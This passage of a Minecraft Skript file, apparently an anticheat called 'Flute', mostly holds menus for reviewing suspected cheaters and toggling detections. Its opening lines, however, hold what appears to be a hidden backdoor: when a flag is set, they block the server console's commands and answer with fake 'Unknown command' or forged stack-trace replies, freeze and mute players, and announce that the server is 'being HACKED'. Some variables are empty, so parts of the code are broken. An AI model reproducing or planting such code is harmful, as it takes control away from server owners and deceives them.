  1925. send "%{G2ovfqIY}% &7| &7Now it will appear as &cHACKED" to {_p}
  1926. function hacked(p: player):
  1927. if {message.hacked.sinev} is not set:
  1928. set {message.hacked.sinev} to true
  1929. send "%{G2ovfqIY}% &7| &7It is now on!" to {_p}
  1930. else if {message.hacked.sinev} is false:
  1931. set {message.hacked.sinev} to true
  1932. send "%{G2ovfqIY}% &7| &7It is now on!" to {_p}
  1933. else if {message.hacked.sinev} is true:
  1934. set {message.hacked.sinev} to false
  1935. send "%{G2ovfqIY}% &7| &7It is now off!" to {_p}
  1936. on command:
  1937. if {lockconsole.sinev} is true:
  1938. if command sender is console:
  1939. if {hacked.sinev} is "Unknown":
  1940. send "Unknown command. Type ""/help"" for help."
  1941. cancel event
  1942. else if {hacked.sinev} is "Error":
  1943. send "org.bukkit.event.EventException"
  1944. send " at org.bukkit.plugin.RegisteredListener.callEvent( ~[spigot.jar:git-Spigot-d276ab1-1f6c04c]"
  1945. send " at org.bukkit.plugin.SimplePluginManager.fireEvent( [spigot.jar:git-Spigot-d276ab1-1f6c04c]"
  1946. send " at org.bukkit.plugin.SimplePluginManager.callEvent( [spigot.jar:git-Spigot-d276ab1-1f6c04c]"
  1947. send " at net.minecraft.server.v1_8_9_R1.PlayerConnection.a( [spigot.jar:git-Spigot-d276ab1-1f6c04c]"
  1948. send " at net.minecraft.server.v1_8_9_R1.PacketPlayInWindowClick.a(SourceFile:33) [spigot.jar:git-Spigot-d276ab1-1f6c04c]"
  1949. send " at net.minecraft.server.v1_8_9_R1.PacketPlayInWindowClick.a(SourceFile:10) [spigot.jar:git-Spigot-d276ab1-1f6c04c]"
  1950. send " at net.minecraft.server.v1_8_9_R1.PlayerConnectionUtils$ [spigot.jar:git-Spigot-d276ab1-1f6c04c]"
  1951. send " at java.util.concurrent.Executors$ Source) [?:1.8.0_111]"
  1952. send " at Source) [?:1.8.0_111]"
  1953. send " at net.minecraft.server.v1_8_9_R1.SystemUtils.a(SourceFile:46) [spigot.jar:git-Spigot-d276ab1-1f6c04c]"
  1954. send " at net.minecraft.server.v1_8_9_R1.MinecraftServer.D( [spigot.jar:git-Spigot-d276ab1-1f6c04c]"
  1955. send " at net.minecraft.server.v1_8_9_R1.DedicatedServer.D( [spigot.jar:git-Spigot-d276ab1-1f6c04c]"
  1956. send " at net.minecraft.server.v1_8_9_R1.MinecraftServer.C( [spigot.jar:git-Spigot-d276ab1-1f6c04c]"
  1957. send " at [spigot.jar:git-Spigot-d276ab1-1f6c04c]"
  1958. send " at Source) [?:1.8.0_111]"
  1959. send "Caused by: java.lang.NullPointerException"
  1960. send " at ~[?:?]"
  1961. send " at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method) ~[?:1.8.0_111]"
  1962. send " at sun.reflect.NativeMethodAccessorImpl.invoke(Unknown Source) ~[?:1.8.0_111]"
  1963. send " at sun.reflect.DelegatingMethodAccessorImpl.invoke(Unknown Source) ~[?:1.8.0_111]"
  1964. send " at java.lang.reflect.Method.invoke(Unknown Source) ~[?:1.8.0_111]"
  1965. send " at$1.execute( ~[spigot.jar:git-Spigot-d276ab1-1f6c04c]"
  1966. send " ... 15 more"
  1967. cancel event
  1968. else if {hacked.sinev} is "Hacked":
  1969. send " "
  1971. send " "
  1972. cancel event
  1973. else:
  1974. stop
  1975. else:
  1976. stop
  1977. on any move:
  1978. if {freeze.sinev.%player%} is true:
  1979. if {message.hacked.sinev} is true:
  1980. cancel event
  1981. message "&c&m--------------------------------------------------"
  1982. message "&7The server is being &cHACKED! &7You are now frozen."
  1983. message "&c&m--------------------------------------------------"
  1984. else:
  1985. cancel event
  1986. stop
  1987. else:
  1988. stop
  1989. on block break:
  1990. if {freeze.sinev.%player%} is true:
  1991. if {message.hacked.sinev} is true:
  1992. cancel event
  1993. message "&c&m--------------------------------------------------"
  1994. message "&7The server is being &cHACKED! &7You are now frozen."
  1995. message "&c&m--------------------------------------------------"
  1996. else:
  1997. cancel event
  1998. stop
  1999. else:
  2000. stop
  2001. on join:
  2002. if {freeze.sinev.%player%} is true:
  2003. set {freeze.sinev.%player%} to true
  2004. else:
  2005. stop
  2006. on chat:
  2007. if {chatno.sinev.%player%} is true:
  2008. cancel event
  2009. else:
  2010. stop
  2011. on quit:
  2012. if {logged.sinev.%player%} is true:
  2013. set {logged.sinev.%player%} to false
  2014. set {chatno.sinev.%player%} to false
  2015. else:
  2016. stop
  2017. command /check [<offline player>]:
  2018. permission: flute.check
  2019. usage: &2/check <player>
  2020. trigger:
  2021. if arg 1 is not set:
  2022. message "&2/check <player>"
  2023. stop
  2024. if arg 1 is set:
  2025. wait 1 tick
  2026. loop all players:
  2027. if loop-player's name is "%arg 1%":
  2028. set {_tonl} to true
  2029. open chest with 4 rows named "%arg 1%" to player
  2030. set {_ka} to {killaura.%arg 1%}
  2031. set {_fb} to {fastbow.%arg 1%}
  2032. set {_fly} to {fly.%arg 1%}
  2033. set {_jesus} to {jesus.%arg 1%}
  2034. set {_speed} to {bhp.%arg 1%}
  2035. set {_clicker} to {autoclicker.%arg 1%}
  2036. set {_antikb} to {antikb.%arg 1%}
  2037. set {_tower} to {tower.%arg 1%}
  2038. set {_scaffold} to {scaffold.%arg 1%}
  2039. wait 2 ticks
  2040. if {_tonl} is not set:
  2041. set {_online} to "&4&lFALSE"
  2042. else:
  2043. set {_online} to "&a&lTRUE"
  2044. set {_points} to {_antikb} + {_clicker} + {_speed} + {_jesus} + {_fly} + {_fb} + {_ka}
  2045. set {_points} to {_points} parsed as number
  2046. wait 2 ticks
  2047. if {_points} = 0:
  2048. set {_l1} to green stained glass pane
  2049. set {_l2} to green stained glass pane
  2050. set {_l3} to green stained glass pane
  2051. set {_l4} to green stained glass pane
  2052. set {_l5} to green stained glass pane
  2053. set {_l6} to green stained glass pane
  2054. if {_points} >= 4:
  2055. set {_l1} to green stained glass pane
  2056. set {_l2} to green stained glass pane
  2057. set {_l3} to yellow stained glass pane
  2058. set {_l4} to yellow stained glass pane
  2059. set {_l5} to yellow stained glass pane
  2060. set {_l6} to yellow stained glass pane
  2061. if {_points} >= 10:
  2062. set {_l1} to green stained glass pane
  2063. set {_l2} to green stained glass pane
  2064. set {_l3} to yellow stained glass pane
  2065. set {_l4} to yellow stained glass pane
  2066. set {_l5} to yellow stained glass pane
  2067. set {_l6} to red stained glass pane
  2068. if {_points} >= 15:
  2069. set {_l1} to green stained glass pane
  2070. set {_l2} to green stained glass pane
  2071. set {_l3} to yellow stained glass pane
  2072. set {_l4} to yellow stained glass pane
  2073. set {_l5} to red stained glass pane
  2074. set {_l6} to red stained glass pane
  2075. if {_points} >= 20:
  2076. set {_l1} to green stained glass pane
  2077. set {_l2} to yellow stained glass pane
  2078. set {_l3} to yellow stained glass pane
  2079. set {_l4} to red stained glass pane
  2080. set {_l5} to red stained glass pane
  2081. set {_l6} to red stained glass pane
  2082. if {_points} >= 25:
  2083. set {_l1} to yellow stained glass pane
  2084. set {_l2} to yellow stained glass pane
  2085. set {_l3} to yellow stained glass pane
  2086. set {_l4} to red stained glass pane
  2087. set {_l5} to red stained glass pane
  2088. set {_l6} to red stained glass pane
  2089. if {_points} >= 30:
  2090. set {_l1} to yellow stained glass pane
  2091. set {_l2} to yellow stained glass pane
  2092. set {_l3} to red stained glass pane
  2093. set {_l4} to red stained glass pane
  2094. set {_l5} to red stained glass pane
  2095. set {_l6} to red stained glass pane
  2096. if {_points} >= 35:
  2097. set {_l1} to yellow stained glass pane
  2098. set {_l2} to red stained glass pane
  2099. set {_l3} to red stained glass pane
  2100. set {_l4} to red stained glass pane
  2101. set {_l5} to red stained glass pane
  2102. set {_l6} to red stained glass pane
  2103. if {_points} >= 40:
  2104. set {_l1} to red stained glass pane
  2105. set {_l2} to red stained glass pane
  2106. set {_l3} to red stained glass pane
  2107. set {_l4} to red stained glass pane
  2108. set {_l5} to red stained glass pane
  2109. set {_l6} to red stained glass pane
  2110. set {_pskul} to "%arg 1%" parsed as offline player
  2111. #-----
  2112. format slot 6 of player with gray stained glass pane named "&0" with lore "&7" to close
  2113. format slot 8 of player with gray stained glass pane named "&0" with lore "&7" to close
  2114. format slot 15 of player with gray stained glass pane named "&0" with lore "&7" to close
  2115. format slot 16 of player with redstone block named "&4&lBAN" with lore "&7Click to ban the player!" to close then run [make player execute command "/flute ban %arg 1% Hacking"]
  2116. format slot 17 of player with gray stained glass pane named "&0" with lore "&7" to close
  2117. format slot 24 of player with gray stained glass pane named "&0" with lore "&7" to close
  2118. format slot 25 of player with gold block named "&6&lKICK" with lore "&7Click to kick the player!" to close then run [make player execute command "/flute kick %arg 1% Hacking"]
  2119. format slot 26 of player with gray stained glass pane named "&0" with lore "&7" to close
  2120. format slot 33 of player with gray stained glass pane named "&0" with lore "&7" to close
  2121. format slot 34 of player with gray stained glass pane named "&0" with lore "&7" to close
  2122. format slot 35 of player with gray stained glass pane named "&0" with lore "&7" to close
  2123. #-----
  2124. format slot 7 of player with {_pskul}'s skull named "&7%arg 1%" with lore "&7Online: &a%{_online}%" to close
  2125. #-----{_antikb} + {_clicker} + {_speed} + {_jesus} + {_fly} + {_fb} + {_ka}
  2126. format slot 5 of player with {_l6} named "&7Amount of checks:" with lore "&a%{_points}%||&7KillAura: &a%{_ka}%||&7AntiKB: &a%{_antikb}%||&7AutoClicker: &a%{_clicker}%||&7Speed: &a%{_speed}%||&7Jesus: &a%{_jesus}%||&7Fly: &a%{_fly}%||&7FastBow: &a%{_fb}%" to close
  2127. format slot 14 of player with {_l6} named "&7Amount of checks:" with lore "&a%{_points}%||&7KillAura: &a%{_ka}%||&7AntiKB: &a%{_antikb}%||&7AutoClicker: &a%{_clicker}%||&7Speed: &a%{_speed}%||&7Jesus: &a%{_jesus}%||&7Fly: &a%{_fly}%||&7FastBow: &a%{_fb}%" to close
  2128. format slot 23 of player with {_l6} named "&7Amount of checks:" with lore "&a%{_points}%||&7KillAura: &a%{_ka}%||&7AntiKB: &a%{_antikb}%||&7AutoClicker: &a%{_clicker}%||&7Speed: &a%{_speed}%||&7Jesus: &a%{_jesus}%||&7Fly: &a%{_fly}%||&7FastBow: &a%{_fb}%" to close
  2129. format slot 32 of player with {_l6} named "&7Amount of checks:" with lore "&a%{_points}%||&7KillAura: &a%{_ka}%||&7AntiKB: &a%{_antikb}%||&7AutoClicker: &a%{_clicker}%||&7Speed: &a%{_speed}%||&7Jesus: &a%{_jesus}%||&7Fly: &a%{_fly}%||&7FastBow: &a%{_fb}%" to close
  2130. format slot 13 of player with {_l5} named "&7Amount of checks:" with lore "&a%{_points}%||&7KillAura: &a%{_ka}%||&7AntiKB: &a%{_antikb}%||&7AutoClicker: &a%{_clicker}%||&7Speed: &a%{_speed}%||&7Jesus: &a%{_jesus}%||&7Fly: &a%{_fly}%||&7FastBow: &a%{_fb}%" to close
  2131. format slot 22 of player with {_l5} named "&7Amount of checks:" with lore "&a%{_points}%||&7KillAura: &a%{_ka}%||&7AntiKB: &a%{_antikb}%||&7AutoClicker: &a%{_clicker}%||&7Speed: &a%{_speed}%||&7Jesus: &a%{_jesus}%||&7Fly: &a%{_fly}%||&7FastBow: &a%{_fb}%" to close
  2132. format slot 31 of player with {_l5} named "&7Amount of checks:" with lore "&a%{_points}%||&7KillAura: &a%{_ka}%||&7AntiKB: &a%{_antikb}%||&7AutoClicker: &a%{_clicker}%||&7Speed: &a%{_speed}%||&7Jesus: &a%{_jesus}%||&7Fly: &a%{_fly}%||&7FastBow: &a%{_fb}%" to close
  2133. format slot 12 of player with {_l4} named "&7Amount of checks:" with lore "&a%{_points}%||&7KillAura: &a%{_ka}%||&7AntiKB: &a%{_antikb}%||&7AutoClicker: &a%{_clicker}%||&7Speed: &a%{_speed}%||&7Jesus: &a%{_jesus}%||&7Fly: &a%{_fly}%||&7FastBow: &a%{_fb}%" to close
  2134. format slot 21 of player with {_l4} named "&7Amount of checks:" with lore "&a%{_points}%||&7KillAura: &a%{_ka}%||&7AntiKB: &a%{_antikb}%||&7AutoClicker: &a%{_clicker}%||&7Speed: &a%{_speed}%||&7Jesus: &a%{_jesus}%||&7Fly: &a%{_fly}%||&7FastBow: &a%{_fb}%" to close
  2135. format slot 30 of player with {_l4} named "&7Amount of checks:" with lore "&a%{_points}%||&7KillAura: &a%{_ka}%||&7AntiKB: &a%{_antikb}%||&7AutoClicker: &a%{_clicker}%||&7Speed: &a%{_speed}%||&7Jesus: &a%{_jesus}%||&7Fly: &a%{_fly}%||&7FastBow: &a%{_fb}%" to close
  2136. format slot 20 of player with {_l3} named "&7Amount of checks:" with lore "&a%{_points}%||&7KillAura: &a%{_ka}%||&7AntiKB: &a%{_antikb}%||&7AutoClicker: &a%{_clicker}%||&7Speed: &a%{_speed}%||&7Jesus: &a%{_jesus}%||&7Fly: &a%{_fly}%||&7FastBow: &a%{_fb}%" to close
  2137. format slot 29 of player with {_l3} named "&7Amount of checks:" with lore "&a%{_points}%||&7KillAura: &a%{_ka}%||&7AntiKB: &a%{_antikb}%||&7AutoClicker: &a%{_clicker}%||&7Speed: &a%{_speed}%||&7Jesus: &a%{_jesus}%||&7Fly: &a%{_fly}%||&7FastBow: &a%{_fb}%" to close
  2138. format slot 19 of player with {_l2} named "&7Amount of checks:" with lore "&a%{_points}%||&7KillAura: &a%{_ka}%||&7AntiKB: &a%{_antikb}%||&7AutoClicker: &a%{_clicker}%||&7Speed: &a%{_speed}%||&7Jesus: &a%{_jesus}%||&7Fly: &a%{_fly}%||&7FastBow: &a%{_fb}%" to close
  2139. format slot 28 of player with {_l2} named "&7Amount of checks:" with lore "&a%{_points}%||&7KillAura: &a%{_ka}%||&7AntiKB: &a%{_antikb}%||&7AutoClicker: &a%{_clicker}%||&7Speed: &a%{_speed}%||&7Jesus: &a%{_jesus}%||&7Fly: &a%{_fly}%||&7FastBow: &a%{_fb}%" to close
  2140. format slot 27 of player with {_l1} named "&7Amount of checks:" with lore "&a%{_points}%||&7KillAura: &a%{_ka}%||&7AntiKB: &a%{_antikb}%||&7AutoClicker: &a%{_clicker}%||&7Speed: &a%{_speed}%||&7Jesus: &a%{_jesus}%||&7Fly: &a%{_fly}%||&7FastBow: &a%{_fb}%" to close
  2141. #-----
  2142. stop
  2143. command /flutebantest:
  2144. trigger:
  2145. message "%{flute.bantype}%"
  2146. stop
  2147. command /fluteconf [<text>] [<text>]:
  2148. permission: flute.admin
  2149. trigger:
  2150. if arg 1 is "bcast":
  2151. if {flute.broadcast} is true:
  2152. message "%{logo}% &7Broadcasts for &2Banning&7/&eKicking &7have been turned &2OFF&7!"
  2153. set {flute.broadcast} to false
  2154. stop
  2155. if {flute.broadcast} is false:
  2156. message "%{logo}% &7Broadcasts for &2Banning&7/&eKicking &7have been turned &aON&7!"
  2157. set {flute.broadcast} to true
  2158. stop
  2159. if arg 1 is "hacks":
  2160. wait 5 ticks
  2161. open chest with 2 rows named "&2Hacks" to player
  2162. set {_gh} to "ghost" parsed as offline player
  2163. wait 2 ticks
  2164. format slot 0 of player with iron sword named "&2Kill Aura" with lore "&7Enabled: &b%{flute.killaura}%" to close then run [make player execute command "/fluteconf enable killaura"]
  2165. format slot 1 of player with bow named "&3Fast Bow" with lore "&7Enabled: &b%{flute.fastbow}%" to close then run [make player execute command "/fluteconf enable fastbow"]
  2166. format slot 2 of player with feather named "&bFly" with lore "&7Enabled: &b%{}%" to close then run [make player execute command "/fluteconf enable fly"]
  2167. format slot 3 of player with water bucket named "&9Jesus" with lore "&7Enabled: &b%{flute.jesus}%" to close then run [make player execute command "/fluteconf enable jesus"]
  2168. format slot 4 of player with diamond boots named "&bSpeed/Bhop" with lore "&7Enabled: &b%{flute.bhp}%" to close then run [make player execute command "/fluteconf enable speed"]
  2169. format slot 5 of player with cobweb named "&2AntiKB" with lore "&7Enabled: &b%{flute.antikb}%" to close then run [make player execute command "/fluteconf enable antikb"]
  2170. format slot 6 of player with golden apple named "&dRegen" with lore "&7Enabled: &b%{flute.regen}%" to close then run [make player execute command "/fluteconf enable regen"]
  2171. format slot 7 of player with cooked beef named "&eFast Eat" with lore "&7Enabled: &b%{}%" to close then run [make player execute command "/fluteconf enable eat"]
  2172. format slot 8 of player with golden pickaxe named "&bFast Build/Break" with lore "&7Enabled: &b%{flute.fastbb}%" to close then run [make player execute command "/fluteconf enable fastbb"]
  2173. format slot 9 of player with {_gh}'s skull named "&bPhase" with lore "&7Enabled: &b%{flute.phase}%" to close then run [make player execute command "/fluteconf enable phase"]
  2174. format slot 10 of player with wooden sword named "&bAuto Clicker" with lore "&7Enabled: &b%{flute.autoclicker}%" to close then run [make player execute command "/fluteconf enable autoclicker"]
  2175. format slot 11 of player with leather boots named "&bNo Fall" with lore "&7Enabled: &b%{flute.nofall}%" to close then run [make player execute command "/fluteconf enable nofall"]
  2176. format slot 11 of player with iron boots named "&bAuto Sneak" with lore "&7Enabled: &b%{flute.autosneak}%" to close then run [make player execute command "/fluteconf enable autosneak"]
  2177. format slot 12 of player with golden boots named "&bHigh Jump" with lore "&7Enabled: &b%{flute.highjump}%" to close then run [make player execute command "/fluteconf enable highjump"]
  2178. format slot 13 of player with wooden axe named "&bMulti Aura" with lore "&7Enabled: &b%{flute.multiaura}%" to close then run [make player execute command "/fluteconf enable multiaura"]
  2179. format slot 13 of player with stone named "&bScaffold" with lore "&7Enabled: &b%{flute.scaffold}%" to close then run [make player execute command "/fluteconf enable scaffold"]
  2180. format slot 13 of player with sandstone named "&bTower" with lore "&7Enabled: &b%{flute.tower}%" to close then run [make player execute command "/fluteconf enable tower"]
  2181. if arg 1 is "banwsettings":
  2182. wait 5 ticks
  2183. open chest with 2 rows named "&cBanwave" to player
  2184. set {_gh} to "ghost" parsed as offline player
  2185. wait 2 ticks
  2186. format slot 0 of player with iron sword named "&2Kill Aura" with lore "&7Allowed: &b%{flute.killaura.ban}%" to close then run [make player execute command "/fluteconf banw killaura"]
  2187. format slot 1 of player with bow named "&3Fast Bow" with lore "&7Allowed: &b%{flute.fastbow.ban}%" to close then run [make player execute command "/fluteconf banw fastbow"]
  2188. format slot 2 of player with feather named "&bFly" with lore "&7Allowed: &b%{}%" to close then run [make player execute command "/fluteconf banw fly"]
  2189. format slot 3 of player with water bucket named "&9Jesus" with lore "&7Allowed: &b%{flute.jesus.ban}%" to close then run [make player execute command "/fluteconf banw jesus"]
  2190. format slot 4 of player with diamond boots named "&bSpeed/Bhop" with lore "&7Allowed: &b%{flute.speed.ban}%" to close then run [make player execute command "/fluteconf banw speed"]
  2191. format slot 5 of player with cobweb named "&2AntiKB" with lore "&7Allowed: &b%{flute.antikb.ban}%" to close then run [make player execute command "/fluteconf banw antikb"]
  2192. format slot 6 of player with golden pickaxe named "&eFast Break" with lore "&7Allowed: &b%{flute.fastbreak.ban}%" to close then run [make player execute command "/fluteconf banw fastbreak"]
  2193. format slot 7 of player with plank named "&bFast Place" with lore "&7Allowed: &b%{flute.fastplace.ban}%" to close then run [make player execute command "/fluteconf banw fastplace"]
  2194. format slot 8 of player with {_gh}'s skull named "&bPhase" with lore "&7Allowed: &b%{flute.phase.ban}%" to close then run [make player execute command "/fluteconf banw phase"]
  2195. format slot 9 of player with wooden sword named "&bAuto Clicker" with lore "&7Allowed: &b%{flute.autoclicker.ban}%" to close then run [make player execute command "/fluteconf banw autoclicker"]
  2196. format slot 10 of player with iron boots named "&bAuto Sneak" with lore "&7Allowed: &b%{flute.autosneak.ban}%" to close then run [make player execute command "/fluteconf banw autosneak"]
  2197. format slot 11 of player with wooden axe named "&bMulti Aura" with lore "&7Allowed: &b%{flute.multiaura.ban}%" to close then run [make player execute command "/fluteconf banw multiaura"]
  2198. format slot 12 of player with stone named "&bScaffold" with lore "&7Allowed: &b%{flute.scaffold.ban}%" to close then run [make player execute command "/fluteconf banw scaffold"]
  2199. format slot 13 of player with sandstone named "&bTower" with lore "&7Allowed: &b%{flute.tower.ban}%" to close then run [make player execute command "/fluteconf banw tower"]
  2200. if arg 1 is "bantype":
  2201. if {flute.bantype} is "banwave":
  2202. set {flute.bantype} to "judgemental"
  2203. message "%{logo}% %{banningmode}%&6&lJudgemental"
  2204. stop
  2205. if {flute.bantype} is "judgemental":
  2206. set {flute.bantype} to "info"
  2207. message "%{logo}% %{banningmode}%&d&lINFO"
  2208. stop
  2209. if {flute.bantype} is "info" or "none":
  2210. set {flute.bantype} to "banwave"
  2211. message "%{logo}% %{banningmode}%&9&lBanWave"
  2212. stop
  2213. if arg 1 is "banw":
  2214. if arg 2 is "killaura":
  2215. if {flute.killaura.ban} is true:
  2216. set {flute.killaura.ban} to false
  2217. message "%{logo}% &2KillAura %{bansettingsoff}%"
  2218. execute player command "/fluteconf banwsettings"
  2219. stop
  2220. else:
  2221. set {flute.killaura.ban} to true
  2222. message "%{logo}% &2KillAura %{bansettingson}%"
  2223. execute player command "/fluteconf banwsettings"
  2224. stop
  2225. if arg 2 is "fastbow":
  2226. if {flute.fastbow.ban} is true:
  2227. set {flute.fastbow.ban} to false
  2228. message "%{logo}% &2FastBow %{bansettingsoff}%"
  2229. execute player command "/fluteconf banwsettings"
  2230. stop
  2231. else:
  2232. set {flute.fastbow.ban} to true
  2233. message "%{logo}% &2FastBow %{bansettingson}%"
  2234. execute player command "/fluteconf banwsettings"
  2235. stop
  2236. if arg 2 is "fly":
  2237. if {} is true:
  2238. set {} to false
  2239. message "%{logo}% &2Fly %{bansettingsoff}%"
  2240. execute player command "/fluteconf banwsettings"
  2241. stop
  2242. else:
  2243. set {} to true
  2244. message "%{logo}% &2Fly %{bansettingson}%"
  2245. execute player command "/fluteconf banwsettings"
  2246. stop
  2247. if arg 2 is "jesus":
  2248. if {flute.jesus.ban} is true:
  2249. set {flute.jesus.ban} to false
  2250. message "%{logo}% &2Jesus %{bansettingsoff}%"
  2251. execute player command "/fluteconf banwsettings"
  2252. stop
  2253. else:
  2254. set {flute.jesus.ban} to true
  2255. message "%{logo}% &2Jesus %{bansettingson}%"
  2256. execute player command "/fluteconf banwsettings"
  2257. stop
  2258. if arg 2 is "speed":
  2259. if {flute.speed.ban} is true:
  2260. set {flute.speed.ban} to false
  2261. message "%{logo}% &2Speed %{bansettingsoff}%"
  2262. execute player command "/fluteconf banwsettings"
  2263. stop
  2264. else:
  2265. set {flute.speed.ban} to true
  2266. message "%{logo}% &2Speed %{bansettingson}%"
  2267. execute player command "/fluteconf banwsettings"
  2268. stop
  2269. if arg 2 is "antikb":
  2270. if {flute.antikb.ban} is true:
  2271. set {flute.antikb.ban} to false
  2272. message "%{logo}% &2AntiKB %{bansettingsoff}%"
  2273. execute player command "/fluteconf banwsettings"
  2274. stop
  2275. else:
  2276. set {flute.antikb.ban} to true
  2277. message "%{logo}% &2AntiKB %{bansettingson}%"
  2278. execute player command "/fluteconf banwsettings"
  2279. stop
  2280. if arg 2 is "fastbreak":
  2281. if {flute.fastbreak.ban} is true:
  2282. set {flute.fastbreak.ban} to false
  2283. message "%{logo}% &2Fast Break %{hackoff}%"
  2284. execute player command "/fluteconf banwsettings"
  2285. stop
  2286. else:
  2287. set {flute.fastbreak.ban} to true
  2288. message "%{logo}% &2Fast Break %{bansettingson}%"
  2289. execute player command "/fluteconf banwsettings"
  2290. stop
  2291. if arg 2 is "fastplace":
  2292. if {flute.fastplace.ban} is true:
  2293. set {flute.fastplace.ban} to false
  2294. message "%{logo}% &2Fast Place %{bansettingsoff}%"
  2295. execute player command "/fluteconf banwsettings"
  2296. stop
  2297. else:
  2298. set {flute.fastplace.ban} to true
  2299. message "%{logo}% &2Fast Place %{bansettingson}%"
  2300. execute player command "/fluteconf banwsettings"
  2301. stop
  2302. if arg 2 is "phase":
  2303. if {flute.phase.ban} is true:
  2304. set {flute.phase.ban} to false
  2305. message "%{logo}% &2Phase %{bansettingsoff}%"
  2306. execute player command "/fluteconf banwsettings"
  2307. stop
  2308. else:
  2309. set {flute.phase.ban} to true
  2310. message "%{logo}% &2Phase %{bansettingson}%"
  2311. execute player command "/fluteconf banwsettings"
  2312. stop
  2313. if arg 2 is "autoclicker":
  2314. if {flute.autoclicker.ban} is true:
  2315. set {flute.autoclicker.ban} to false
  2316. message "%{logo}% &2AutoClicker %{bansettingsoff}%"
  2317. execute player command "/fluteconf banwsettings"
  2318. stop
  2319. else:
  2320. set {flute.autoclicker.ban} to true
  2321. message "%{logo}% &2AutoClicker %{bansettingson}%"
  2322. execute player command "/fluteconf banwsettings"
  2323. stop
  2324. if arg 2 is "autosneak":
  2325. if {flute.autosneak.ban} is true:
  2326. set {flute.autosneak.ban} to false
  2327. message "%{logo}% &2AutoSneak %{bansettingsoff}%"
  2328. execute player command "/fluteconf banwsettings"
  2329. stop
  2330. else:
  2331. set {flute.autosneak.ban} to true
  2332. message "%{logo}% &2AutoSneak %{bansettingson}%"
  2333. execute player command "/fluteconf banwsettings"
  2334. stop
  2335. if arg 2 is "multiaura":
  2336. if {flute.multiaura.ban} is true:
  2337. set {flute.multiaura.ban} to false
  2338. message "%{logo}% &2MultiAura %{bansettingsoff}%"
  2339. execute player command "/fluteconf banwsettings"
  2340. stop
  2341. else:
  2342. set {flute.multiaura.ban} to true
  2343. message "%{logo}% &2MultiAura %{bansettingson}%"
  2344. execute player command "/fluteconf banwsettings"
  2345. stop
  2346. if arg 2 is "scaffold":
  2347. if {flute.scaffold.ban} is true:
  2348. set {flute.scaffold.ban} to false
  2349. message "%{logo}% &2Scaffold %{bansettingsoff}%"
  2350. execute player command "/fluteconf banwsettings"
  2351. stop
  2352. else:
  2353. set {flute.scaffold.ban} to true
  2354. message "%{logo}% &2Scaffold %{bansettingson}%"
  2355. execute player command "/fluteconf banwsettings"
  2356. stop
  2357. if arg 2 is "tower":
  2358. if {flute.tower.ban} is true:
  2359. set {flute.tower.ban} to false
  2360. message "%{logo}% &2Tower %{bansettingsoff}%"
  2361. execute player command "/fluteconf banwsettings"
  2362. stop
  2363. else:
  2364. set {flute.tower.ban} to true
  2365. message "%{logo}% &2Tower %{bansettingson}%"
  2366. execute player command "/fluteconf banwsettings"
  2367. stop
  2368. if arg 1 is "enable":
  2369. if arg 2 is "killaura":
  2370. if {flute.killaura} is true:
  2371. set {flute.killaura} to false
  2372. message "%{logo}% &2KillAura %{hackoff}%"
  2373. execute player command "/fluteconf hacks"
  2374. stop
  2375. else:
  2376. set {flute.killaura} to true
  2377. message "%{logo}% &2KillAura %{hackon}%"
  2378. execute player command "/fluteconf hacks"
  2379. stop
  2380. if arg 2 is "fastbow":
  2381. if {flute.fastbow} is true:
  2382. set {flute.fastbow} to false
  2383. message "%{logo}% &2FastBow %{hackoff}%"
  2384. execute player command "/fluteconf hacks"
  2385. stop
  2386. else:
  2387. set {flute.fastbow} to true
  2388. message "%{logo}% &2FastBow %{hackon}%"
  2389. execute player command "/fluteconf hacks"
  2390. stop
  2391. if arg 2 is "highjump":
  2392. if {flute.highjump} is true:
  2393. set {flute.highjump} to false
  2394. message "%{logo}% &2HighJump %{hackoff}%"
  2395. execute player command "/fluteconf hacks"
  2396. stop
  2397. else:
  2398. set {flute.highjump} to true
  2399. message "%{logo}% &2HighJump %{hackon}%"
  2400. execute player command "/fluteconf hacks"
  2401. stop
  2402. if arg 2 is "fly":
  2403. if {} is true:
  2404. set {} to false
  2405. message "%{logo}% &2Fly %{hackoff}%"
  2406. execute player command "/fluteconf hacks"
  2407. stop
  2408. else:
  2409. set {} to true
  2410. message "%{logo}% &2Fly %{hackon}%"
  2411. execute player command "/fluteconf hacks"
  2412. stop
  2413. if arg 2 is "jesus":
  2414. if {flute.jesus} is true:
  2415. set {flute.jesus} to false
  2416. message "%{logo}% &2Jesus %{hackoff}%"
  2417. execute player command "/fluteconf hacks"
  2418. stop
  2419. else:
  2420. set {flute.jesus} to true
  2421. message "%{logo}% &2Jesus %{hackon}%"
  2422. execute player command "/fluteconf hacks"
  2423. stop
  2424. if arg 2 is "speed":
  2425. if {flute.bhp} is true:
  2426. set {flute.bhp} to false
  2427. message "%{logo}% &2Speed %{hackoff}%"
  2428. execute player command "/fluteconf hacks"
  2429. stop
  2430. else:
  2431. set {flute.bhp} to true
  2432. message "%{logo}% &2Speed %{hackon}%"
  2433. execute player command "/fluteconf hacks"
  2434. stop
  2435. if arg 2 is "antikb":
  2436. if {flute.antikb} is true:
  2437. set {flute.antikb} to false
  2438. message "%{logo}% &2AntiKB %{hackoff}%"
  2439. execute player command "/fluteconf hacks"
  2440. stop
  2441. else:
  2442. set {flute.antikb} to true
  2443. message "%{logo}% &2AntiKB %{hackon}%"
  2444. execute player command "/fluteconf hacks"
  2445. stop
  2446. if arg 2 is "regen":
  2447. if {flute.regen} is true:
  2448. set {flute.regen} to false
  2449. message "%{logo}% &2Regen %{hackoff}%"
  2450. execute player command "/fluteconf hacks"
  2451. stop
  2452. else:
  2453. set {flute.regen} to true
  2454. message "%{logo}% &2Regen %{hackon}%"
  2455. execute player command "/fluteconf hacks"
  2456. stop
  2457. if arg 2 is "multiaura":
  2458. if {flute.multiaura} is true:
  2459. set {flute.multiaura} to false
  2460. message "%{logo}% &2MultiAura %{hackoff}%"
  2461. execute player command "/fluteconf hacks"
  2462. stop
  2463. else:
  2464. set {flute.multiaura} to true
  2465. message "%{logo}% &2MultiAura %{hackon}%"
  2466. execute player command "/fluteconf hacks"
  2467. stop
  2468. if arg 2 is "eat":
  2469. if {} is true:
  2470. set {} to false
  2471. message "%{logo}% &2FastEat %{hackoff}%"
  2472. execute player command "/fluteconf hacks"
  2473. stop
  2474. else:
  2475. set {} to true
  2476. message "%{logo}% &2FastEat %{hackon}%"
  2477. execute player command "/fluteconf hacks"
  2478. stop
  2479. if arg 2 is "fastbb":
  2480. if {flute.fastbb} is true:
  2481. set {flute.fastbb} to false
  2482. message "%{logo}% &2Fast Build/Break %{hackoff}%"
